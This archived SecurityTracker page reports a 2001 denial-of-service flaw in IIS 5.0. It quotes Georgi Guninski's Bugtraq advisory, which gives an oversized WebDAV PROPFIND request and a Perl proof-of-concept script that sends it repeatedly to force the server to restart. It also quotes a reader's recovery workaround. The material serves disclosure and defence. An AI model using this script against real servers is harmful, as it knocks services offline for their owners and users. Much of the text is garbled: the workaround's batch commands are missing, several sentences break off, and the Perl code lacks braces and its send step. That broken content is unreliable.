Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
Re: Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User
SecurityTracker Alert ID:  1001067
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 12 2001
Impact:   Denial of service via network

Version(s): v5.0
Description:   Georgi Guninski reports a vulnerability with Microsoft's Internet Information Server (IIS) v5.0 in which a remote user can send a certain packet to the server, causing the server to automatically restart

The message below contains a suggested workaround.

Impact:   A remote user with access to the web server's port (which is basically everyone in the case of a public web server) can cause the server to crash and restart.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Boundary error, State error
Underlying OS:  Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
Mar 8 2001 Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User

 Source Message Contents

Subject:  Re: IIS 5.0 PROPFIND DOS

While Microsoft is solving this issue and there is no
patch available, I recommend the following workaround
successfully tried over IIS 5.0 (Windows 2000) and IIS 5.1 (Whistler).

Create a batch file (ex: workaround.bat) with the following 2 lines:


save the file in a safe place not acessible by HTTP.

1 - Click "Properties" in the "World Wide Web Publishing Service" service
2 - Choose the "Recovery" tab
3 - Select the "Run a File" option in the "First Failure" combo box.
4 - In the "Run file" text box, type the full pathname of your batch file
created above.
5 - Repeat this procedure for the "Second failure" and "Subsequent failures"
combo boxes.

In case of problems using this approach, any input is appreciated!

Tiago Halm

-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ@SECURITYFOCUS.COM]On Behalf Of Georgi
Sent: quinta-feira, 8 de Marco de 2001 10:51

Georgi Guninski security advisory #38, 2001


Systems affected:
IIS 5.0

Risk: Medium but may turn more serious
Date: 8 March 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it
You may not modify it and distribute it or distribute parts of it without
the author's
written permission.

The opinions expressed in this advisory and program are my own and not of
any company.
The usual standard disclaimer applies, especially the fact that Georgi
is not liable for any damages caused by direct or  indirect use of the
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this
advisory or program or
any derivatives thereof.


It is possible to remotely restart all IIS related service using specially
crafted request.
It is also possible to force IIS to consume memory which it does not free.
Seems to be a buffer overflow, don't know whether it is exploitable, let me
know if you find
a way to exploit it.


Basically the problem are very long but valid propfind request.
For example the following PROPFIND request works for me:
<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:" xmlns:u="over:"><a:prop><a:displayname /><u:$over
where length($over) ~ 128008
The first time the request is send IIS replies with 500 ... Exception. The
second time the services are
# Written by Georgi Guninski
use IO::Socket;

print "IIS 5.0 propfind\n";

$port = @ARGV[1];
$host = @ARGV[0];

sub vv()

$ll=$_[0]; #length of buffer
$over=$ch x $ll; #string to overflow

$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto =>
"TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:"
xmlns:u="'."$over".':"><a:prop><a:displayname />'."<u:$over
# ^^^^ This is another issue and also works with length ~>65000

$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:"
xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost:
$host\nContent-length: $l\n\n$xml\n\n";
print ".";
#print "r=".$res;
close $socket;

do vv(128008,"V"); # may need to change the length
do vv(128008,"V");
print "Done.\n";


Workoround: Disable WebDav extensions and PROPFIND though I do not recommend
using IIS on the Internet.

Vendor status:
Microsoft was informed on 3 March 2001

Happy 8 March to the women.

Georgi Guninski


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC